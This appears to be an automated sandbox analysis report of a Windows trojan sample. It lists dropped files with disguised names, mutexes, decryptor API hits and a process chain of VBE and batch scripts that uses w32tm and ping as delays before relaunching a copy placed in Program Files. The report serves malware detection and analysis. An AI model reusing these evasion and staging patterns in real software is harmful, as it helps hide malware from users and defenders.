                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 22_2_00007FFD9BAA0D7022_2_00007FFD9BAA0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BAEA4C727_2_00007FFD9BAEA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BAFA38927_2_00007FFD9BAFA389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BABD7B627_2_00007FFD9BABD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BAA0D7027_2_00007FFD9BAA0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB0CB4127_2_00007FFD9BB0CB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB04BEB27_2_00007FFD9BB04BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BABBD2D27_2_00007FFD9BABBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BAEA4C732_2_00007FFD9BAEA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BAFA38932_2_00007FFD9BAFA389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB0CB4132_2_00007FFD9BB0CB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB04BEB32_2_00007FFD9BB04BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BAAF67932_2_00007FFD9BAAF679
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BAA0D7032_2_00007FFD9BAA0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BABD7B632_2_00007FFD9BABD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BABBD2D32_2_00007FFD9BABBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BAFA4C737_2_00007FFD9BAFA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BB0A38937_2_00007FFD9BB0A389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BACD7B637_2_00007FFD9BACD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BAB0D7037_2_00007FFD9BAB0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BACBD2D37_2_00007FFD9BACBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 42_2_00007FFD9BA90D7042_2_00007FFD9BA90D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BAFA4C747_2_00007FFD9BAFA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BB0A38947_2_00007FFD9BB0A389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BAB0D7047_2_00007FFD9BAB0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BB1CB4147_2_00007FFD9BB1CB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BB14BEB47_2_00007FFD9BB14BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BACD7B647_2_00007FFD9BACD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 47_2_00007FFD9BACBD2D47_2_00007FFD9BACBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BB1CB4152_2_00007FFD9BB1CB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BB14BEB52_2_00007FFD9BB14BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BAFA4C752_2_00007FFD9BAFA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BB0A38952_2_00007FFD9BB0A389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BAB0D7052_2_00007FFD9BAB0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BACD7B652_2_00007FFD9BACD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 52_2_00007FFD9BACBD2D52_2_00007FFD9BACBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 57_2_00007FFD9BAD0D7057_2_00007FFD9BAD0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BAFCB4163_2_00007FFD9BAFCB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BAF4BEB63_2_00007FFD9BAF4BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BA90D7063_2_00007FFD9BA90D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BADA4C763_2_00007FFD9BADA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BAEA38963_2_00007FFD9BAEA389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BAAD7B663_2_00007FFD9BAAD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 63_2_00007FFD9BAABD2D63_2_00007FFD9BAABD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: String function: 00007FFD9BB094F3 appears 40 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: String function: 002EEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: String function: 002EEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: String function: 002EF5F0 appears 31 times
                                    Source: 7vP2IvNXqx.exe, 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exe, 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: winIntorefruntimebroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@114/50@0/1
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D6C74 GetLastError,FormatMessageW,0_2_002D6C74
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_002EA6C2
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Program Files (x86)\windows mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdllJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Users\user\AppData\Local\Temp\6vaca2I0eyJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: sfxname0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: sfxstime0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: STARTDLG0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: xz20_2_002EDF1E
                                    Source: 7vP2IvNXqx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 7vP2IvNXqx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 7vP2IvNXqx.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile read: C:\Users\user\Desktop\7vP2IvNXqx.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\7vP2IvNXqx.exe "C:\Users\user\Desktop\7vP2IvNXqx.exe"
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
